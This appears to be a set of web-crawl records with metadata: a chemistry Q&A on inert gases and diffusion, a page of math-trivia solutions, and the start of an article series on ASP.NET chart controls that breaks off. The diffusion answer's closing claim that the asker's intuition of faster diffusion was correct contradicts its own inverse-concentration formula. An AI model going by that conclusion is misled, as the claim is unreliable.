"# Effect on rate of diffusion in addition of an inert gas\n\nWhat will be the effect on the rate of diffusion on addition of an inert gas to the gaseous mixture?\n\nI think the rate of diffusion should increase as the addition of extra gas will increase the inside pressure. But the given answer contradicts my proposed explanation. Where am I wrong? And why is the rate of diffusion decreasing?\n\nMy question does not ask about the effect of addition of an inert gas on a reaction equilibrium.\n\n• Is this from a book? If you add that source and the exact quote, other people with a similar problem will also be able to find this question. – Gaurang Tandon Mar 9 '18 at 10:14\n\nThe inter-diffusion caused by two gasses is described by the Stefan-Maxwell equation.\n\nIf $x_1,x_2$ are the mole fractions of the two gasses, $\\bar v$, the average speed and $\\lambda$ the mean free path then\n\n$$D_{1,2}= \\frac{x_2}{2}\\bar v_1\\lambda_1+ \\frac{x_1}{2}\\bar v_2\\lambda_2$$\n\nwhere $D_{1,2}$ is the inter-diffusion coefficient. Substituting for the mean free paths does not lead to a useful result because terms that involve collision between molecules of the same kind cannot have any extra effect compared to when only one gas is present, and so these are ignored. The result is\n\n$$D_{1,2}= \\frac{1}{\\pi\\sigma_{1,2}^2(n_1+n_2)} \\left( \\frac{2k_BT}{\\pi\\mu} \\right)^{1/2}$$\n\nwhere $\\sigma_{1,2}$ is the sum of the radii of the two molecule types and $n_1, n_2$ number of molecules/m$^3$ of each, the reduced mass is $\\mu$ kg ($\\mu=m_1m_2/(m_1+m_2)$).\n\nThis equation shows that the inter-diffusion depends on the total concentration at a given temperature, a result that is close to that observed experimentally. So your intuition was correct.\n\n(ref chapter (II). E. Moelwyn-Hughes, 'Physical Chemistry')"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.83909154,"math_prob":0.997655,"size":1106,"snap":"2019-43-2019-47","text_gpt3_token_len":340,"char_repetition_ratio":0.104355715,"word_repetition_ratio":0.0,"special_character_ratio":0.30650994,"punctuation_ratio":0.095454544,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99978596,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-13T07:34:01Z\",\"WARC-Record-ID\":\"<urn:uuid:dd3c5fce-a2e6-407c-a106-449be97d2ad7>\",\"Content-Length\":\"132148\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:429f5f3c-9a84-4adf-8f6e-910f9707ce1f>\",\"WARC-Concurrent-To\":\"<urn:uuid:56acde93-556a-45f2-ba0a-1880551c6976>\",\"WARC-IP-Address\":\"151.101.193.69\",\"WARC-Target-URI\":\"https://chemistry.stackexchange.com/questions/91958/effect-on-rate-of-diffusion-in-addition-of-an-inert-gas\",\"WARC-Payload-Digest\":\"sha1:2ZIINAEJ7DT6KLCP4VUCAQGVELQIFKK3\",\"WARC-Block-Digest\":\"sha1:3NDXLCKZU6XQ5G2OXJPPFPE2JPJGGDZM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496666229.84_warc_CC-MAIN-20191113063049-20191113091049-00352.warc.gz\"}"} |
https://modulomathy.com/2013/09/ | [
"# Posted in September 2013 …\n\n## #math trivia #257 solution\n\n#math trivia for #September14: #257 is a prime of the form 2^(2^n)+1. What is n? Which other day-numbers (1-365) have this form?— Burt Kaliski Jr. (@modulomathy) September 15, 2013 Answer: n = 3 gives 2^(2^n) + 1 = 2^(2^3) + 1 = 2^8 + 1 = 257. Other day-numbers of this form are 3 … Continue reading\n\n## #math trivia #256 solution\n\n#math trivia for #September13: #256 is the last 8th power <= 365. How many years of day-numbers does it take to get to the next 8th power? — Burt Kaliski Jr. (@modulomathy) September 14, 2013 The next 8th power is 38 = 6561. It takes almost 18 years of day-numbers (365 or 366 numbers per … Continue reading\n\n## #math trivia #255 solution\n\n#math trivia for #September12: #255 is the largest 8-bit number. For what n does the largest n-bit number divide 255? Vice versa? — Burt Kaliski Jr. (@modulomathy) September 13, 2013 Only n-bit numbers for n ≤ 8 can possibly divide 255, so let’s consider the largest n-bit numbers for n from 1 to 8. They … Continue reading\n\n## #math trivia #254 solution\n\n#math trivia for #September11: #254 is the product of a prime and a Mersenne prime. What are the primes? — Burt Kaliski Jr. (@modulomathy) September 11, 2013 A Mersenne prime is a prime p that has the form p = 2q-1 where q is also prime. The prime factors of 254 are 2 and 127. … Continue reading\n\n## #math trivia #180 solution\n\n#math trivia for #June28: #180 has prime factorization 2*2*3*3*5 and profile 2+2+3+3+5=15. Is there a larger number with a smaller profile? — Burt Kaliski Jr. (@modulomathy) June 29, 2012 The “profile” of a number is a term I made up for this problem (though others may have used it first). It seemed like a good … Continue reading\n\n## #math trivia #253 solution\n\n#math trivia for #September10: #253 is the product of a Sophie Germain prime and its matching safe prime. What are the primes? — Burt Kaliski Jr. (@modulomathy) September 11, 2013 A Sophie Germain prime is a prime p with the property that 2p+1 is also prime. The prime q = 2p+1 is called the matching … Continue reading\n\n## #math trivia #252 solution\n\n#math trivia for #September9: #252 is divisible by two perfect numbers. What other day-numbers (1-365) have this property? — Burt Kaliski Jr. (@modulomathy) September 9, 2013 There are two perfect numbers that are small enough to divide a day-number, 6 and 28, and they both divide 252. Because the least common multiple of 6 and … Continue reading\n\n## #math trivia #251 solution\n\n#math trivia for #September8: #251 is the largest 8-bit prime. What are the largest 2-, 3-, 4-, 5-, 6- and 7-bit primes? (Why no 1-bits?) — Burt Kaliski Jr. (@modulomathy) September 8, 2013 The largest primes of length 2 to 7 bits are 3, 7, 13, 31, 61, and 127. As it turns out, the … Continue reading\n\n## #math trivia #179 solution\n\n#math trivia for #June27: #179 can be constructed from the digits 1, 7 and 9 using four +s and two *s. How? — Burt Kaliski Jr. (@modulomathy) June 27, 2012 For simplicity, let’s start with the assumption that “from the digits” means that the only numbers input to the equation are the single digits 1, … Continue reading\n\n## #math trivia #250 solution\n\n#math trivia for #September7: #250 cents can be “changed” into dollars and quarters how many ways? How about dollars, quarters and dimes? — Burt Kaliski Jr. (@modulomathy) September 7, 2013 There are three ways to change 250 cents or \\$2.50 into dollars and quarters, depending on the number of dollars given: Two dollars, two quarters … Continue reading"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.89232713,"math_prob":0.7419783,"size":3476,"snap":"2019-43-2019-47","text_gpt3_token_len":1049,"char_repetition_ratio":0.17050691,"word_repetition_ratio":0.08279221,"special_character_ratio":0.32652473,"punctuation_ratio":0.118309855,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9881038,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-21T02:42:40Z\",\"WARC-Record-ID\":\"<urn:uuid:920e42f6-fa57-454f-9390-a1322f40381f>\",\"Content-Length\":\"37969\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:534384ba-d54f-43a9-b53c-4addb0397ded>\",\"WARC-Concurrent-To\":\"<urn:uuid:1fab98e4-266f-44c0-bc62-2ad2db6c953a>\",\"WARC-IP-Address\":\"192.0.78.25\",\"WARC-Target-URI\":\"https://modulomathy.com/2013/09/\",\"WARC-Payload-Digest\":\"sha1:2AGPFXNWRB46Q4RNNTPMYXYM52C7CWEU\",\"WARC-Block-Digest\":\"sha1:AY5FXLODIINSNPAJWCZJVUILZ32ZFKF4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496670643.58_warc_CC-MAIN-20191121000300-20191121024300-00360.warc.gz\"}"} |
https://docs.mosek.com/latest/dotnetfusion/case-studies-ellipsoids.html | [
"# 11.6 Inner and outer Löwner-John Ellipsoids¶\n\nIn this section we show how to compute the Löwner-John inner and outer ellipsoidal approximations of a polytope. They are defined as, respectively, the largest volume ellipsoid contained inside the polytope and the smallest volume ellipsoid containing the polytope, as seen in Fig. 11.7.",
null,
"Fig. 11.7 The inner and outer Löwner-John ellipse of a polygon.¶\n\nFor further mathematical details, such as uniqueness of the two ellipsoids, consult . Our solution is a mix of conic quadratic and semidefinite programming. Among other things, in Sec. 11.6.3 (Bound on the Determinant Root) we show how to implement bounds involving the determinant of a PSD matrix.\n\n## 11.6.1 Inner Löwner-John Ellipsoids¶\n\nSuppose we have a polytope given by an h-representation\n\n$\\mathcal{P} = \\{ x \\in \\real^n \\mid Ax \\leq b \\}$\n\nand we wish to find the inscribed ellipsoid with maximal volume. It will be convenient to parametrize the ellipsoid as an affine transformation of the standard disk:\n\n$\\mathcal{E} = \\{ x \\mid x = Cu + d,\\ u\\in\\real^n,\\ \\| u \\|_2 \\leq 1 \\}.$\n\nEvery non-degenerate ellipsoid has a parametrization such that $$C$$ is a positive definite symmetric $$n\\times n$$ matrix. Now the volume of $$\\mathcal{E}$$ is proportional to $$\\mbox{det}(C)^{1/n}$$. The condition $$\\mathcal{E}\\subseteq\\mathcal{P}$$ is equivalent to the inequality $$A(Cu+d)\\leq b$$ for all $$u$$ with $$\\|u\\|_2\\leq 1$$. After a short computation we obtain the formulation:\n\n(11.22)$\\begin{split}\\begin{array}{lll} \\maximize & t & \\\\ \\st & t \\leq \\mbox{det}(C)^{1/n}, & \\\\ & (b-Ad)_i\\geq \\|(AC)_i\\|_2, & i=1,\\ldots,m,\\\\ & C \\succeq 0, & \\end{array}\\end{split}$\n\nwhere $$X_i$$ denotes the $$i$$-th row of the matrix $$X$$. This can easily be implemented using Fusion, where the sequence of conic inequalities can be realized at once by feeding in the matrices $$b-Ad$$ and $$AC$$.\n\nListing 11.11 Fusion implementation of model (11.22). Click here to download.\n public static Tuple<double[], double[]> lownerjohn_inner(double[][] A, double[] b)\n{\nusing( Model M = new Model(\"lownerjohn_inner\"))\n{\nint m = A.Length;\nint n = A.Length;\n\n// Setup variables\nVariable t = M.Variable(\"t\", 1, Domain.GreaterThan(0.0));\nVariable C = det_rootn(M, t, n);\nVariable d = M.Variable(\"d\", n, Domain.Unbounded());\n\n// (bi - ai^T*d, C*ai) \\in Q\nfor (int i = 0; i < m; ++i)\nM.Constraint(\"qc\" + i, Expr.Vstack(Expr.Sub(b[i], Expr.Dot(A[i], d)), Expr.Mul(C, A[i])),\nDomain.InQCone().Axis(0) );\n\n// Objective: Maximize t\nM.Objective(ObjectiveSense.Maximize, t);\nM.Solve();\n\nreturn Tuple.Create(C.Level(), d.Level());\n}\n}\n\n\nThe only black box is the method det_rootn which implements the constraint $$t\\leq \\mbox{det}(C)^{1/n}$$. It will be described in Sec. 11.6.3 (Bound on the Determinant Root).\n\n## 11.6.2 Outer Löwner-John Ellipsoids¶\n\nTo compute the outer ellipsoidal approximation to a polytope, let us now start with a v-representation\n\n$\\mathcal{P} = \\mbox{conv}\\{ x_1, x_2, \\ldots , x_m \\} \\subseteq \\real^n,$\n\nof the polytope as a convex hull of a set of points. We are looking for an ellipsoid given by a quadratic inequality\n\n$\\mathcal{E} = \\{ x\\in\\real^n \\mid \\| Px-c \\|_2 \\leq 1 \\},$\n\nwhose volume is proportional to $$\\mbox{det}(P)^{-1/n}$$, so we are after maximizing $$\\mbox{det}(P)^{1/n}$$. Again, there is always such a representation with a symmetric, positive definite matrix $$P$$. The inclusion conditions $$x_i\\in\\mathcal{E}$$ translate into a straightforward problem formulation:\n\n(11.23)$\\begin{split}\\begin{array}{lll} \\maximize & t &\\\\ \\st & t \\leq \\mbox{det}(P)^{1/n}, &\\\\ & \\|Px_i - c\\|_2 \\leq 1, &i=1,\\ldots,m,\\\\ & P \\succeq 0, & \\end{array}\\end{split}$\n\nand then directly into Fusion code:\n\nListing 11.12 Fusion implementation of model (11.23). Click here to download.\n public static Tuple<double[], double[]> lownerjohn_outer(double[,] x)\n{\nusing( Model M = new Model(\"lownerjohn_outer\") )\n{\nint m = x.GetLength(0);\nint n = x.GetLength(1);\n\n// Setup variables\nVariable t = M.Variable(\"t\", 1, Domain.GreaterThan(0.0));\nVariable P = det_rootn(M, t, n);\nVariable c = M.Variable(\"c\", Domain.Unbounded().WithShape(1,n));\n\n// (1, P(*xi+c)) \\in Q\nM.Constraint(\"qc\",\nExpr.Hstack(Expr.Ones(m), Expr.Sub(Expr.Mul(x,P), Expr.Repeat(c,m,0))),\nDomain.InQCone().Axis(1));\n\n// Objective: Maximize t\nM.Objective(ObjectiveSense.Maximize, t);\nM.Solve();\n\nreturn Tuple.Create(P.Level(), c.Level());\n}\n}\n\n\n## 11.6.3 Bound on the Determinant Root¶\n\nIt remains to show how to express the bounds on $$\\mbox{det}(X)^{1/n}$$ for a symmetric positive definite $$n\\times n$$ matrix $$X$$ using PSD and conic quadratic variables. We want to model the set\n\n(11.24)$C = \\lbrace (X, t) \\in \\PSD^n \\times \\real \\mid t \\leq \\mbox{det}(X)^{1/n} \\rbrace.$\n\nA standard approach when working with the determinant of a PSD matrix is to consider a semidefinite cone\n\n(11.25)$\\begin{split}\\left( {\\begin{array}{cc}X & Z \\\\ Z^T & \\mbox{Diag}(Z) \\\\ \\end{array} } \\right) \\succeq 0\\end{split}$\n\nwhere $$Z$$ is a matrix of additional variables and where we intuitively identify $$\\mbox{Diag}(Z)=\\{\\lambda_1,\\ldots,\\lambda_n\\}$$ with the eigenvalues of $$X$$. With this in mind, we are left with expressing the constraint\n\n(11.26)$t \\leq (\\lambda_1\\cdot\\ldots\\cdot\\lambda_n)^{1/n}.$\n\nThis is easy to implement recursively using rotated quadratic cones when $$n$$ is a power of $$2$$. In general it is convenient to express (11.26) as a composition of power cones, see or Modeling Cookbook.\n\nListing 11.13 Approaching the determinant, see (11.25). Click here to download.\n public static Variable det_rootn(Model M, Variable t, int n)\n{\n// Setup variables\nVariable Y = M.Variable(Domain.InPSDCone(2 * n));\n\nVariable X = Y.Slice(new int[]{0, 0}, new int[]{n, n});\nVariable Z = Y.Slice(new int[]{0, n}, new int[]{n, 2 * n});\nVariable DZ = Y.Slice(new int[]{n, n}, new int[]{2 * n, 2 * n});\n\n// Z is lower-triangular\nint[,] low_tri = new int[n*(n-1)/2,2];\nint k = 0;\nfor(int i = 0; i < n; i++)\nfor(int j = i+1; j < n; j++)\n{ low_tri[k,0] = i; low_tri[k,1] = j; ++k; }\nM.Constraint(Z.Pick(low_tri), Domain.EqualsTo(0.0));\n// DZ = Diag(Z)\nM.Constraint(Expr.Sub(DZ, Expr.MulElm(Z, Matrix.Eye(n))), Domain.EqualsTo(0.0));\n\n// t^n <= (Z11*Z22*...*Znn)\ngeometric_mean(M, DZ.Diag(), t);\n\n// Return an n x n PSD variable which satisfies t <= det(X)^(1/n)\nreturn X;\n}\n\nListing 11.14 Bounding the geometric mean, see (11.26). Click here to download.\n public static void geometric_mean(Model M, Variable x, Variable t)\n{\nint n = (int)x.GetSize();\nif (n==1)\nM.Constraint(Expr.Sub(t, x), Domain.LessThan(0.0));\nelse\n{\nVariable t2 = M.Variable();\nM.Constraint(Var.Hstack(t2, x.Index(n-1), t), Domain.InPPowerCone(1-1.0/n));\ngeometric_mean(M, x.Slice(0,n-1), t2);\n}\n}"
] | [
null,
"https://docs.mosek.com/latest/dotnetfusion/_images/ellipses_polygon.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.67290497,"math_prob":0.99983424,"size":5408,"snap":"2022-27-2022-33","text_gpt3_token_len":1593,"char_repetition_ratio":0.103256844,"word_repetition_ratio":0.047493402,"special_character_ratio":0.30991125,"punctuation_ratio":0.20307167,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99996305,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-28T02:45:49Z\",\"WARC-Record-ID\":\"<urn:uuid:dc2195b9-ddcf-4d33-97ea-5eea7b4ad588>\",\"Content-Length\":\"41571\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:322f48b4-c4df-4f4e-8064-c9a084b28106>\",\"WARC-Concurrent-To\":\"<urn:uuid:f41454b4-eed7-43d6-a4aa-ff45a1b26c9c>\",\"WARC-IP-Address\":\"18.67.76.122\",\"WARC-Target-URI\":\"https://docs.mosek.com/latest/dotnetfusion/case-studies-ellipsoids.html\",\"WARC-Payload-Digest\":\"sha1:BC6BCO6LT75VHO3MZK52N4BYMEYKDJ7G\",\"WARC-Block-Digest\":\"sha1:5O2IQKXF5JUD33LD3VEKU45FH7HTZ5LA\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103347800.25_warc_CC-MAIN-20220628020322-20220628050322-00477.warc.gz\"}"} |
https://hal.archives-ouvertes.fr/hal-01963626 | [
"Families of Solutions of Order 5 to the Johnson Equation Depending on 8 Parameters\n\nAbstract : We give different representations of the solutions of the Johnson equation with parameters. First, an expression in terms of Fredholm determinants is given; we give also a representation of the solutions written as a quotient of wronskians of order 2N. These solutions of order N depend on 2N − 1 parameters. When one of these parameters tends to zero, we obtain N order rational solutions expressed as a quotient of two polynomials of degree 2N (N + 1) in x, t and 4N (N + 1) in y depending on 2N − 2 parameters. Here, we explicitly construct the expressions of the rational solutions of order 5 depending on 8 real parameters and we study the patterns of their modulus in the plane (x, y) and their evolution according to time and parameters $a_i$ and $b_i$ for 1 ≤ i ≤ 4.\nKeywords :\nDocument type :\nJournal articles\nComplete list of metadatas\n\nhttps://hal.archives-ouvertes.fr/hal-01963626\nContributor : Imb - Université de Bourgogne <>\nSubmitted on : Friday, December 21, 2018 - 2:21:00 PM\nLast modification on : Sunday, December 23, 2018 - 1:07:41 AM\n\nCitation\n\nPierre Gaillard. Families of Solutions of Order 5 to the Johnson Equation Depending on 8 Parameters. New Horizons in Mathematical Physics, 2018, 2 (4), ⟨10.22606/nhmp.2018.24001⟩. ⟨hal-01963626⟩\n\nRecord views"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.885005,"math_prob":0.8784659,"size":785,"snap":"2019-43-2019-47","text_gpt3_token_len":191,"char_repetition_ratio":0.17925736,"word_repetition_ratio":0.0,"special_character_ratio":0.23694268,"punctuation_ratio":0.08053691,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96987146,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-17T13:10:54Z\",\"WARC-Record-ID\":\"<urn:uuid:2cfcb9ae-5c5d-4248-acc9-8d93b8bdf845>\",\"Content-Length\":\"34370\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b306d4fc-f4cc-4d46-a1b4-29f9ff5c2560>\",\"WARC-Concurrent-To\":\"<urn:uuid:12b0cfc2-9ebf-4543-8c69-a0432a05e375>\",\"WARC-IP-Address\":\"193.48.96.10\",\"WARC-Target-URI\":\"https://hal.archives-ouvertes.fr/hal-01963626\",\"WARC-Payload-Digest\":\"sha1:ZHOSSNKISE45CHS3MSB53LQVIJCIJTC6\",\"WARC-Block-Digest\":\"sha1:N3UPVQZ6LDJIXDEHFSQFOPAS2O3W7GSJ\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986675316.51_warc_CC-MAIN-20191017122657-20191017150157-00410.warc.gz\"}"} |
https://www.daniweb.com/programming/software-development/threads/460170/how-to-use-values-from-one-function-to-another-function | [
"dear list,\nwhat i have to do is, i have perform some mathmatical operation in one function and using its results as input into another function, here is my code of what i had done till now :\n\n``````import math\ndef Math(x1,y1):\na = x1+y1\nb = x1-y1\nc = x1*y1\nd = x1/y1\nprint \"subtraction is:\", b\nprint \"multiplication is:\", c\nprint \"division is: \", d\nprint \"square is:\", e\nprint \"square root is\", f\n\nx1 = 0\nx = raw_input(\"enter first number: \")\nwhile not (x.isdigit()):\nx = raw_input(\"enter a valid number: \")\nx1 = int(x)\n\ny1 = 0\ny = raw_input(\"enter second number: \")\nwhile not (y.isdigit()):\ny = raw_input(\"enter a valid number: \")\ny1 = int(y)\n\nMath(x1,y1)\n\ndef Manipulator():\na1 = raw_input(\"choose the first number among a, b, c, d: \")\na2 = raw_input(\"choose the second number among a, b, c, d: \")\nif a1 =='a':\n#here i have to assign the value of a from function Math() to a1\n``````\n\nand in the similar way if user choose 'c' as second number then i have to assign the value of c from Math() to a2,\ni am unable to do this, i dont know how to call a value from one function to another function, hope you understand what i am trying to ask.\n\n## All 7 Replies\n\nUse function with parameters and return statement\n\nWhoa, whoa whoa, you'll have to redesign it.\nFirst, rename your vars, I haven't, but you should.\nSecond, have `Math` return, then print, I've done this for you\nThird, lowecase your vars, that's style.\n\n``````import math\ndef Math(x1,y1):\na = x1+y1\nb = x1-y1\nc = x1*y1\nd = x1/y1\nreturn (a,b,c,d)\nx1 = 0\nx = raw_input(\"enter first number: \")\nwhile not (x.isdigit()):\nx = raw_input(\"enter a valid number: \")\nx1 = int(x)\ny1 = 0\ny = raw_input(\"enter second number: \")\nwhile not (y.isdigit()):\ny = raw_input(\"enter a valid number: \")\ny1 = int(y)\na,b,c,d = Math(x1,y1) #unpacking of vars\nprint \"subtraction is:\", b\nprint \"multiplication is:\", c\nprint \"division is: \", d\nprint \"square is:\", e\nprint \"square root is\", f\ndef Manipulator():\na1 = raw_input(\"choose the first number among a, b, c, d: \") #got to rename\na2 = raw_input(\"choose the second number among a, b, c, d: \")\nexec(\"a1=\"+a1) #fancy shmancy no ifs\nexec(\"a2=\"+a2)\n``````\n\nSquare and square root of what?\n\ni just forget to make it comment, it was nothing just bymistake :(\n\nthis is how i come to complete what i was trying to do, i know this is not the right way to do, but i have no one whom i ask so i am asking you guys please mention my mistakes so that i can again put my effort to make it proper, my code is:\n\n``````import math\n\ndef Math(x1,y1):\na = x1+y1\nb = x1-y1\nc = x1*y1\nd = x1/y1\nwhile True:\ne1 = raw_input(\"in Math() which number you want for square x or y: \")\nif e1 == 'x':\ne = x1**2\nbreak\nelif e1 == 'y':\ne = y1**2\nbreak\nelse:\ne1 = raw_input(\"please enter the valid entry x or y :\")\nwhile True:\nf1 = raw_input(\"in Math() which number you want for square root x or y: \")\nif f1 == 'x':\nf = math.sqrt(x1)\nbreak\nelif f1 == 'y':\nf = math.sqrt(y1)\nbreak\nelse:\nf1 = raw_input(\"please enter the valid entry x or y :\")\nreturn (a,b,c,d,e,f)\n\nx1 = 0\nx = raw_input(\"enter first number for Math(): \")\nwhile not (x.isdigit()):\nx = raw_input(\"enter a valid number for Math: \")\nx1 = int(x)\ny1 = 0\ny = raw_input(\"enter second number: \")\nwhile not (y.isdigit()):\ny = raw_input(\"enter a valid number: \")\ny1 = int(y)\na,b,c,d,e,f = Math(x1,y1) #unpacking of vars\n\ndef Manipulator():\nwhile True:\na1 = raw_input(\"For Manipulator() choose the first number among a,b,c,d,e,f: \")\nif a1 == 'a':\nn1 = int(a)\nbreak\nelif a1 == 'b':\nn1 = int(b)\nbreak\nelif a1 == 'c':\nn1 = int(c)\nbreak\nelif a1 == 'd':\nn1 = int(d)\nbreak\nelif a1 == 'e':\nn1 = int(e)\nbreak\nelif a1 == 'f':\nn1 = int(f)\nbreak\nelse:\na1 = raw_input(\"For Manipulator() choose the fir number among a,b,c,d,e,f: \")\nwhile True:\na2 = raw_input(\"For Manipulator() choose the second number among a,b,c,d,e,f: \")\nif a2 == 'a':\nn2 = int(a)\nbreak\nelif a2 == 'b':\nn2 = int(b)\nbreak\nelif a2 == 'c':\nn2 = int(c)\nbreak\nelif a2 == 'd':\nn2 = int(d)\nbreak\nelif a2 == 'e':\nn2 = int(e)\nbreak\nelif a2 == 'f':\nn2 = int(f)\nbreak\nelse:\na2 = raw_input(\"For Manipulator() choose the sec number among a,b,c,d,e,f: \")\n\nsub = n1-n2\nmul = n1*n2\ndiv = n1/n2\nwhile True:\nsq1 = raw_input(\"In Manipulator() which number you want for square i or j: \")\nif sq1 == 'i':\nsq = n1**2\nbreak\nelif sq1 == 'j':\nsq = n2**2\nbreak\nelse:\nsq1 = raw_input(\"please enter the valid entry i or j :\")\nwhile True:\nsqt1 = raw_input(\"In Manipulator() which number you want for square root i or j: \")\nif sqt1 == 'i':\nsqt = math.sqrt(n1)\nbreak\nelif sqt1 == 'j':\nsqt = math.sqrt(n2)\nbreak\nelse:\nsqt1 = raw_input(\"please enter the valid entry i or j :\")\n\nprint \"subtraction for Manipulator() is: \",sub\nprint \"multiplication for Manipulator() is: \",mul\nprint \"division for Manipulator() is: \",div\nprint \"square for Manipulator() is:\", sq\nprint \"square root for Manipulator() is\", sqt\n\nManipulator()\n\nprint \"\\n additin for Math() is: \", a\nprint \"subtraction for Math() is:\", b\nprint \"multiplication for Math() is:\", c\nprint \"division for Math() is: \", d\nprint \"square for Math() is:\", e\nprint \"square root for Math() is\", f\n\n#and here is the output:\n\nenter first number for Math(): 3\nenter second number: 4\nin Math() which number you want for square x or y: x\nin Math() which number you want for square root x or y: y\nFor Manipulator() choose the first number among a,b,c,d,e,f: d\nFor Manipulator() choose the second number among a,b,c,d,e,f: c\nIn Manipulator() which number you want for square i or j: i\nIn Manipulator() which number you want for square root i or j: j\n\nsubtraction for Manipulator() is: -12\nmultiplication for Manipulator() is: 0\ndivision for Manipulator() is: 0\nsquare for Manipulator() is: 0\nsquare root for Manipulator() is 3.46410161514\n\nsubtraction for Math() is: -1\nmultiplication for Math() is: 12\ndivision for Math() is: 0\nsquare for Math() is: 9\nsquare root for Math() is 2.0\n``````\n\nthis program will give error if i enter 0 for y, and the error is :\nZeroDivisionError: integer division or modulo by zero\ni am unable to found any solution, please suggest some appropriate way to resolve this problem.\n\nWhen you try to divide by zero ...\n\n``````x = 2\ny = 0\nprint(x/y)\n\n''' result ...\nTraceback (most recent call last):\nFile \"Untitled\", line 3\nprint(x/y)\nZeroDivisionError: division by zero\n'''\n``````\n\nYou could protect yourself this way ...\n\n``````x = 2\ny = 0\nif y != 0:\nprint(x/y)\nelse:\nprint(\"Division by zero error\")\n``````\nBe a part of the DaniWeb community\n\nWe're a friendly, industry-focused community of developers, IT pros, digital marketers, and technology enthusiasts meeting, networking, learning, and sharing knowledge."
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8110333,"math_prob":0.9985692,"size":1169,"snap":"2023-40-2023-50","text_gpt3_token_len":349,"char_repetition_ratio":0.13733906,"word_repetition_ratio":0.07174888,"special_character_ratio":0.32420874,"punctuation_ratio":0.15589353,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9998927,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-10T19:56:27Z\",\"WARC-Record-ID\":\"<urn:uuid:1c36ce00-0c69-434b-b2d2-fffd457f0f4d>\",\"Content-Length\":\"100164\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b513224e-7e32-487e-9ea2-b8e183691486>\",\"WARC-Concurrent-To\":\"<urn:uuid:61393456-d45e-419a-a9e8-40fc697ccef5>\",\"WARC-IP-Address\":\"172.66.40.216\",\"WARC-Target-URI\":\"https://www.daniweb.com/programming/software-development/threads/460170/how-to-use-values-from-one-function-to-another-function\",\"WARC-Payload-Digest\":\"sha1:QHI3NYQQXGARYBVLEOEYHRB6S3ZFSVJM\",\"WARC-Block-Digest\":\"sha1:YXW7WQS6NDCP35CKNXRNQGXBSJNUFMAY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679102637.84_warc_CC-MAIN-20231210190744-20231210220744-00517.warc.gz\"}"} |
https://www.4guysfromrolla.com/articles/111809-1.aspx | [
"When you think ASP, think...",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"Recent Articles",
null,
"All Articles ASP.NET Articles ASPFAQs.com Related Web Technologies User Tips! Coding Tips Search",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"Sections: Book Reviews •Sample Chapters JavaScript Tutorials MSDN Communities Hub Official Docs Security Stump the SQL Guru! Web Hosts XML Information: Advertise Feedback Author an Article",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"",
null,
"# Using Microsoft's Chart Controls In An ASP.NET Application: Adding Statistical Formulas\n\nBy Scott Mitchell\n\nA Multipart Series on Microsoft's Chart Controls\nA picture is worth a 1,000 words... This adage rings especially true when it comes to reporting. Charts summarize and illuminate patterns in data in a way that long tables of numbers simply cannot. The Microsoft Chart Controls are a free and encompassing set of charts for WinForms and ASP.NET applications. This article series explores how to use these Chart Controls in an ASP.NET application.\n\n• Getting Started - walks through getting started using the Chart Controls, from version requirements to downloading and installing the Chart Controls, to displaying a simple chart in an ASP.NET page.\n• Plotting Chart Data - examines the multitude of ways by which data can be plotted on a chart, from databinding to manually adding the points one at a time.\n• Rendering the Chart - the Chart Controls offer a variety of ways to render the chart data into an image. This article explores these options.\n• Sorting and Filtering Chart Data - this article shows how to programmatically sort and filter the chart's data prior to display.\n• Programmatically Generating Chart Images - learn how to programmatically create and alter the chart image file.\n• Creating Drill Down Reports - see how to build drill down reports using the Chart control.\n• Adding Statistical Formulas - learn how to add statistical formulas, such as mean, median, variance, and forecasts, to your charts.\n• Enhancing Charts With Ajax - improve the user experience for dynamic and interactive charts using Ajax.\n• Serializing Chart Data - see how to persist a chart's data and appearance to a persistent store.\n• Using the Chart Controls with ASP.NET MVC - learn how to display charts in an ASP.NET MVC 